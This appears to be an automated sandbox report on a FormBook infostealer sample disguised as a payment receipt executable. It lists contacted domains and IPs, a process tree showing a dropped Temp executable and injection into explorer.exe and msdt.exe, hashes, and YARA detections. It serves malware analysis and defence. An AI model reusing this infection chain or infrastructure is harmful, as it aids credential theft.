                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Nov 29, 2022 16:43:29.596674919 CET8.8.8.8192.168.2.70x36ccNo error (0)www.030332.com58777.zhanghonghong.comCNAME (Canonical name)IN (0x0001)false
                                                      Nov 29, 2022 16:43:29.596674919 CET8.8.8.8192.168.2.70x36ccNo error (0)58777.zhanghonghong.com103.100.208.243A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 16:43:40.623732090 CET8.8.8.8192.168.2.70xee3cNo error (0)www.vnsuda.lol75.2.115.196A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 16:43:49.039021015 CET8.8.8.8192.168.2.70x818No error (0)www.coolfashionshop.xyz34.110.163.134A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 16:43:56.273133039 CET8.8.8.8192.168.2.70xf885No error (0)www.stephapproved.comstephapproved.comCNAME (Canonical name)IN (0x0001)false
                                                      Nov 29, 2022 16:43:56.273133039 CET8.8.8.8192.168.2.70xf885No error (0)stephapproved.com70.32.23.81A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 16:44:03.757194996 CET8.8.8.8192.168.2.70xf051No error (0)www.bem4u.shopbem4u.shopCNAME (Canonical name)IN (0x0001)false
                                                      Nov 29, 2022 16:44:03.757194996 CET8.8.8.8192.168.2.70xf051No error (0)bem4u.shop2.57.90.16A (IP address)IN (0x0001)false
                                                      Nov 29, 2022 16:44:11.068994045 CET8.8.8.8192.168.2.70x9572No error (0)www.kahrabaonline.com160.121.219.144A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.030332.com
                                                      • www.vnsuda.lol
                                                      • www.coolfashionshop.xyz
                                                      • www.stephapproved.com
                                                      • www.bem4u.shop

                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:16:42:03
                                                      Start date:29/11/2022
                                                      Path:C:\Users\user\Desktop\payment_copy2_receipt.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\payment_copy2_receipt.exe
                                                      Imagebase:0x400000
                                                      File size:548510 bytes
                                                      MD5 hash:9B8C61DED729CA6C9D5F7FDED18EEF27
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low

                                                      General

                                                      Target ID:1
                                                      Start time:16:42:04
                                                      Start date:29/11/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\fcvvthv.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
                                                      Imagebase:0x400000
                                                      File size:125440 bytes
                                                      MD5 hash:353F7D8845E3DD77D50661A00EC7DF55
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 54%, ReversingLabs
                                                      Reputation:low

                                                      General

                                                      Target ID:2
                                                      Start time:16:42:04
                                                      Start date:29/11/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6edaf0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:3
                                                      Start time:16:42:05
                                                      Start date:29/11/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\fcvvthv.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
                                                      Imagebase:0x400000
                                                      File size:125440 bytes
                                                      MD5 hash:353F7D8845E3DD77D50661A00EC7DF55
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      General

                                                      Target ID:4
                                                      Start time:16:42:12
                                                      Start date:29/11/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff75ed40000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:high

                                                      General

                                                      Target ID:12
                                                      Start time:16:42:52
                                                      Start date:29/11/2022
                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\msdt.exe
                                                      Imagebase:0xaf0000
                                                      File size:1508352 bytes
                                                      MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      Disassembly

                                                      No disassembly